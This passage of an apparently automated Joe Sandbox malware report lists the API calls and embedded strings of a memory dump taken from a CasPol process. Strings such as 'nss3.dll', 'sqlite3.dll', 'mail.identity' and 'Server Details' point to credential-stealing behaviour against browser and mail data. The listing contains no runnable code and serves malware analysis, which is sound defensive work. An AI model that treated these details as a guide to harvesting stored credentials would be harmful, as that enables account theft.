                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: rows deleted
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                  • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                  • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                  • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                  • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: $, $CREATE TABLE
                                                                                                                                                                                  • API String ID: 3510742995-3459038510
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                  • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                    • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                    • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3503910906-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3798638045-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                  • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4107816708-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                  • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                  • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1886415126-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen
                                                                                                                                                                                  • String ID: >$>$>
                                                                                                                                                                                  • API String ID: 39653677-3911187716
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                  • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                  • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi
                                                                                                                                                                                  • String ID: C@$mail.identity
                                                                                                                                                                                  • API String ID: 1439213657-721921413
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                  • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                  • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1479990042-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00406640
                                                                                                                                                                                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset$memcmp
                                                                                                                                                                                  • String ID: Ul@
                                                                                                                                                                                  • API String ID: 270934217-715280498
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 203655857-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                                  • API String ID: 3699762281-259020660
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                  • String ID: recovered %d pages from %s
                                                                                                                                                                                  • API String ID: 985450955-1623757624
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _ultoasprintf
                                                                                                                                                                                  • String ID: %s %s %s
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00409919
                                                                                                                                                                                  • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendmemset
                                                                                                                                                                                  • String ID: N\@
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                  • String ID: menu_%d
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _msizerealloc
                                                                                                                                                                                  • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                  • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                  • String ID: sqlite3.dll
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString
                                                                                                                                                                                  • String ID: A4@$Server Details
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                  • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                  • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3110682361-0
                                                                                                                                                                                  • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                  • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                  • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
